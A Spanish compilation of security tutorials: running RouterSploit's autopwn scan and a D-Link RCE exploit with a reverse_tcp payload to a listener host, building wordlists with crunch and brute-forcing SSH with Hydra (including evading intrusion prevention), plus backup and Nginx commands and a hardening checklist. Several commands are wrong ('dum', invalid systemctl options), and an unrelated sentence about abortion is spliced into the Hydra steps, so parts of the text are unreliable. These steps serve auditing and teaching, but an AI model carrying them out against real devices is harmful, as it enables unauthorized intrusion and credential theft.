Análisis de Vulnerabilidades de un Router

Ahorita realizaremos un análisis de vulnerabilidades de los routers de nuestra organización, para ello utilizaremos un Framework Open Source de seguridad llamado RouterSploit, con el se puede realizar auditoria de distintos dispositivos como routers, webcam, equipos NAS, entre otros.

Este framework contiene 5 módulos, que son los siguientes:

1. exploit

2. creds

3. scanners

4. payloads

5. generic

Su función es la siguiente:

1. exploits: Este módulos que aprovechan las vulnerabilidades identificadas.

2. creds: El módulos creds es para probar credenciales en los servicios de red.

3. scanners: Con este módulos se verifica si un objetivo es vulnerable a cualquier exploit.

4. payloads: módulos para generar cargas útiles en diversas arquitecturas.

5. generic: módulos que realizan ataques genéricos.

Ya que conocemos los modulos vamos a proceder a realizar la instalación

Instalación

Para un correcto funcionamiento de RouterSploit se necesita instalar los siguientes paquetes:

- future

- requests

- paramiko

- pysnmp

- pycrypto

- bluepy (opcional)

#apt install future requests paramiko pysnmp pycrypto

Ahora se procede a la instalación de pip en Python3

#apt install python3-pip

Clonación del RouterSploit 

git clone https://www.github.com/threat9/routersploit

Nos posicionamos en él directorio.

Una vez que se descomprime el archivo descargado entramos en la carpeta


cd routersploit

Instalamos los requisitos.

python3 -m pip install -r requirements.txt

Ejecución de RouterSploit

python3 rsf.py

Como usar RouterSploit

Para comenzar a utilizar el RouterSploit debes conocer la ip de los dispositivos que vas auditar 

Comandos iniciales


Una vez que se inicia el RouterSploit, se procede a seleccionar el modulo scanner con autopwn (Esto lanzara todos los exploit contra el objetivo)

use scanner/autopwn

Luego se procede a marcar el objetivo

set target [IP-DISPOSITIVO]

Se procede a realizar el attack del dispositivo 

Colocamos el siguiente comando
run

Una vez finalizado el chek del dispositivo mostrara si posee vulnerabilidades y cual es el exploits para esa vulnerabilidad, para esto se debe utilizar los siguientes comando

Comando use exploits/routers/marca_routers/codigo_exploits

Uso del exploit para el objetivo
use exploits/routers/dlink/dls_2750b_rce

Comando para colocar exploits en el objetivo
set target ip

Ejemplo

set target 192.168.1.1

Verificamos la vulnerabilidad del objetivo check

Atacamos run

Consultamos la carga realizada show payloads

Colocamos el payloads reverse_tcp y consultamos las opciones
set payloads reverse_tcp
show options

Cargamos la ip del host donde queremos hacer el ataque
set lhost 192.168.1.10

Atacamosrun

Una vez listo podemos colocar un pwd o ls y listamos los directorios

Posteriormente salimos
exit

Como actualizar RouterSploit

Nos ubicamos en el directorio

cd routersploit

Una vez en el directorio realizamos un pull para actualizar los paquetes

git pull

Como crear Backup en Linux

Cuando se administran plataformas se deben tener políticas que permitan mantener el resguardo total de la data, políticas de respaldos diarios ya que no sabemos si problemas graves afecten la información en producción

Para esto hay comandos como los siguientes para realizar el respaldo y la restauración de la misma

Sintaxis para realizar Backup en Linux

Permite guardar el directorio completo

dum -0aj -f /ruta-donde-se-guardara-el-respaldo.bak: /ruta-del-respaldo

Permite guardar el directorio incremental

dum -1aj -f ruta-donde-se-guardara-el-respaldo.bak: /ruta-del-respaldo

Permite restaurar el backup creado interactivamente

restore -if /ruta-donde-se-restaurara-el-respaldo.bak:

Ejemplo de como realizar Backup en Linux

Permite guardar el directorio WWW completo 

dump -0aj -f /var/www.bak /www: hacer una salva completa del directorio ‘/www’.

Permite guardar el directorio WWW incremental

dump -1aj -f /var/www.bak /www: hacer una salva incremental del directorio ‘/www’.

Permite restaurar el backup creado interactivamente

restore -if /var/www.bak: restaurando una salva interactivamente.

Comandos en Nginx

1.- Start Nginx

#service nginx start

otra opción...

#systemctl start nginx

La respuesta valida debe ser 

Starting nginx server…

2.- Stop Nginx

#service nginx stop

otra opción...

#systemctl stop nginx

La respuesta valida debe ser 

Stopping nginx Server…

3.- Detener todos los procesos de Nginx

#killall -9 nginx

4.- Cerrar las conexiones abiertas antes de detener Nginx

#service nginx quit

otra opción

#systemctl quit nginx

5.- Reiniciar el servicio de Nginx

#service nginx restart

otra opción...

#systemctl restart nginx

La respuesta valida debe ser 

Stopping nginx Server… [ OK ] 

Starting nginx Server… [ OK ]

6.- Recargar el servicio de Nginx ( Este comando permite realizar el reinicio tomando una nueva configuración)

#service nginx reload

otra opción


#systemctl reload nginx

La respuesta valida debe ser 

Reloading nginx Server… [ OK ]

7.- Estado del servidor

#service nginx status

otra opción

#systemctl status nginx

8.- Comprobar que una configuración realizada es valida (antes de reiniciar o hacer un reload):

#service nginx configtest

otra opción


#systemctl config nginx


La respuesta valida debe ser 

nginx: the configuration file /etc/nginx-sp/nginx.conf syntax is ok

nginx: configuration file /etc/nginx-sp/nginx.conf test is successful


9.- Verificar versión de nginx

#service nginx -v

otra opción

#systemctl -v nginx

10.- Si quieres mas información sobre la versión de nginx, incluyendo su configuración

#service nginx -V

otra opción

#systemctl -V nginx

11.- Mostrar la ayuda en consola

#service nginx -h

otra opción

#systemctl -h nginx

Como crear un diccionario de contraseñas

En este articulo voy a explicar como es el proceso para crear un diccionario de usuarios y un diccionario de contraseña que luego lo podrás utilizar para Hydra para realizar el acceso y la validación de usuario y contraseña ya creados 

En ese paso generamos el diccionario de usuarios

#nano user_list

admin

administrador

sudo

users

superusers

Nota: puedes ingresar otros usuarios basados en tu prueba estos son ejemplos

#cat user_list

Procedemos a utilizar la herramienta crunch para generar el diccionario de contraseñas

Para esto tenemos que instalar Crunch

#apt install crunch

Una vez instaldo Crunch realizamos el siguiente paso

#crunch 8 8 arondon12358 > /home/usuario/pass_list

Aquí estamos indicando crear un diccionario de contraseñas con una logitud minima de 8 caracteres, longitud máxima de 8 caracteres y basada en arondon12358

Para verficar el archivo creado realizamos el siguiente comando

#head pass_list

y

#tail pass_list

Una vez creado los diccionarios de usuarios y contraseñas se debe realizar la comprobación de conectividad y puertos abiertos de la maquina a la que se desea acceder realizando ping y un análisis con nmap

Una vez verificada la conectividad y los puertos, procedemos a realizar el ataque con Hydra, colocamos en el terminal lo siguiente

Comando para que indique las opciones y ejemplos de hydra

#hydra 

Con los parametros -L y -P utilizaremos los diccionarios creados en la primera parte del articulo
Con el parametro -s indicaremos el puerto (Puede ser opcional)
Con el parametro -f cerraremos la herramienta en el momento que encuentre un usuario y contraseña

#hydra ip-atacar ssh -s 22 -L user_list -P pass_list -f -vV 

Presionamos enter y esperamos que encuentre un usuario contraseña valido
Una vez finalizado arrojara que ha encontrado un usuario y password valido, el cual puedes usarlo con el comando ssh la misma ip que utilizamos con hydra y podras acceder al equipo 

Instalación de Hydra en Debian

Instalación de Hydra en Debian 9

Instalar Hydra en Linux, desde repositorios
Sabias que en Debian 8 y 9 (la ultima versión) puede instalar Hydra desde los repositorios. 

#apt-get install hydra-gtk 

Con estos pasos iniciaras la instalacion de la versión de línea de comando junto con la GUI del front-end. 

¡No haga esto si quiere una versión más rápida y nueva con más funciones! 

En el caso de eliminarlo lo puedes hacer con el siguiente comando:

#apt-get purge hydra-gtk && sudo apt-get autoremove && sudo apt-get autoclean

Instale Hydra en Linux, desde la fuente, la última versión
Con esta modalidad vamos a proceder a compilar desde el código fuente 

Primero abres un terminal y procedes a realizar una actualización
#apt-get update && sudo apt-get upgrade && sudo apt-get dist-upgrade

Una vez actualizado el sistema procedemos a realizar la instalación de unas dependencias de Hydra en Linux
#apt-get -y install build-essential 
#apt-get install git 

En estas opciones, marque los correctos para su distribución, o simplemente elimine las barras y ejecútelos todos, de esa manera debe tener todo instalado correctamente.
En el caso que indique que algo no se encuentra. 
#apt-get install libssl-dev libssh-dev libidn11-dev libpcre3-dev \ libgtk2.0-dev libmysqlclient-dev libpq-dev libsvn-dev \ firebird-dev libncp-dev

Una vez instalado todos los paquetes necesarios para utilizar hydra procedemos a clonarlo de Gtihub
git clone https://github.com/vanhauser-thc/thc-hydra.git 

Ahora, ve a la carpeta clonada con tu terminal. 
cd thc-hydra 

Luego configúralo. No se necesitan privilegios de root esta vez. 
./configure 

Cuando la última línea now type "make" , sabrá que nada salió mal, así que hagámoslo.
make 

Si los hombres pudieran quedar embarazadas, el aborto sería un sacramento | ¿Qué? | Está bien cuando veas ese texto, puedes hacer el siguiente comando. ¡Este como root! 
sudo make install

Una vez culminado este proceso ya debería estar instalado en todo tu sistema, por lo cual no deberias entrar en la carpeta para usarlo. 


Para utilizarlo puedes escribir now cd para ir a su carpeta de inicio y luego escriba hydra -help para probarlo. Si obtiene líneas de instrucciones, debe instalarse correctamente.

Hydra - Ataque por contraseña

¿Qué es un ataque por contraseña?

Un ataque por contraseña se trata de adivinar las contraseñas que se encuentren cifradas de forma manual o tambien utilizando un script que permita automatizar este proceso.

¿Cuales son los tipos de ataques de contraseña?

Hay varios tipos de contraseñas que se pueden insertar como por ejemplo las alfabéticas, numéricas , caracteres , minúsculas, mayúsculas , caracteres especiales.

¿Como se dan los tipos de ataques de contraseñas?

Ataques de diccionario: usando una lista de contraseñas tradicionales.

Phishing de contraseña: se hace pasar por una entidad confiable.

Ataques de fuerza bruta: generando todas las combinaciones posibles.

¿Que es Hydra?

Permite forzar el inicio de sesión de red de forma rapida, la cual te perimeta enlazarte a varios servicios del sistema que se requiere analizar.

¿Cuales son los Protocolos soportados por Hydra?

POP3

FTP

HTTP-GET, HTTP-FORM-POST, HTTPS-GET …

Firebird

Subversion (SVN)

Telnet

Y muchos más

¿Qué tipo de ataques puede hacer Hydra?

Ataques de diccionario paralelo (16 hilos por defecto)

Fuerza bruta / ataques híbridos

Nulos (campos vacíos), invertidos (coloca la contraseña al revés),coloca la contraseñas en el campo de usuario

Disminuye el proceso de ataque con la siguiente intención: evita la detección: IPS (sistema de prevención de intrusiones)

Ataque en paralelo de diferentes servidores.

¿Como instalar Hydra en Linux?

Instalar Hydra desde los Repositorios

Instalar Hydra desde los Fuentes

Hardening - actividades debemos desarrollar para asegurar nuestros Sistemas:

En este post se listan las actividades que se deben realizar en el hardening, con la finalidad de asegurar tu sistema 

• Los procesos de arranque (del bootstrapping del sistema)
• Los servicios o demonios que se ejecuten en el inicio y apagado del sistema
• Aseguramiento de Sistemas de archivos (comúnmente denominados File System en *NIX y volúmenes en Netware – Novell)
• Uso de opciones de limites y forzar cuentas de usuario
• Políticas del sistema, filtrados y Acls
• Protección a ataques físicos o de Hardware (Seguridad Física)
• Actualización de Firmware, BIOS, Softpaq, contraseñas de arranque de los equipos, desactivación de unidades externas en servidores como pen drive o memorias USB, disqueteras, unidades de Cd/DvD, opticas.
• Protección y renombre de cuentas de Administración y deshabilitar o invalidar cuentas estándares, invitado, uso de cuentas limitadas.
• Restricción de Instalación de Software y Hardware de acuerdo a las políticas de seguridad.
• Habilitar los sistemas de Auditorias y Monitoreo de logs.
• Asegurar consolas de administración, pantallas de logeo, terminales virtuales y accesos remotos.
• Políticas y procedimientos de administración de cuentas de usuario, grupos, TCBS (Truste Base Computing), módulos de autenticación agregables y relaciones de confianza.
• Administración de paquetes de instalación, parches (Patchs), upgrades, updates, módulos instalables, integridad de archivos y permisos en el sistema.
• Aseguramiento de las Herramientas de Desarrollo y compiladores.
• Aseguramiento de Núcleos (Kernel) del sistema.
• Instalación y afinación de Firewalls, Kits de Seguridad (Antivirus, antispyware, antimalware, anti hackers, anti banners) Sistemas de Detección de Intrusos y Sensores como IDS,IPS,HIDS, NIDS.
• Uso de Herramientas para Pen Testing y Monitoreo .
• Configuración de Protocolos, Puertos y Servicios (Solo los necesarios).
• Implementación de esquemas de seguridad, DMZ, Front End / Back End, Router apantallados, proxys, Firewalls.
• Políticas de Procedimientos de Respaldo y de Disaster Recovery.